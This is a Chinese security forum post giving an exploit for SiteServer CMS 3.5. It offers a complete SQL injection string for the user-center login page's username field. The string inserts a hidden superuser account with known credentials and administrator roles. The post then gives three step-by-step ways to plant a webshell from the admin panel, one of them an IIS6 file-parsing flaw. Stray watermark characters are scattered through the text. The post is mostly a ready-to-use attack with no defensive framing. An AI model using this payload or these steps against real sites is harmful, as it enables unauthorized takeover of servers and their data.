找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2895|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版+ J( G8 P4 b3 |: I
stieserver官网:www.siteserver.cn; [7 ?5 }& H" w# k/ [% e
EXP:
+ c. o) N% ~+ p6 T& R& _8 Q+ v直接访问UserCenter/login.aspx
& f% T8 V! w( R( z6 K2 J  I$ {1 q用户名处输入:( ?- M3 q+ s8 f; o* m8 t

# o6 X5 f/ k6 U! L0 E. O2 K/ e  @# H123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–3 L- a$ U' E' O: l
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
. O  ~. v% O! ]之后再访问后台SiteServer/login.aspx用插入的用户登陆
8 X* h% u$ M, ?8 e5 S0 d后台拿webshell的三种方法:. M; ]' f1 c5 u
一、: y+ r9 d- @  |) ?
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
2 ?6 ~' T5 [9 T9 g( N" c# M1 O二、( e7 Y3 a7 n; ?3 \1 _
成员权限-》添加用户-》用户名为:1.asp% u* q( \0 A; p
http://127.0.0.1/usercenter/# s9 L: b3 K3 p: S- m1 k9 h
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
8 J' {1 Q# Y1 _, L! q- ?(ps:后台添加用户时不会验证是否含有非法字符)3 q- b: W/ p: b9 x
三、
$ T' y) g9 ~+ _0 n3 f# K0 g系统工具-》实用工具-》机器参数查看
$ H. N$ j5 d8 C7 X, A可以看到数据库类型、名称,WEB路径$ `6 l( ^3 j" |5 t/ T* Y
系统工具-》数据库工具-》SQL语句查询2 r9 G  F& [# [- E: R: K4 Y
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表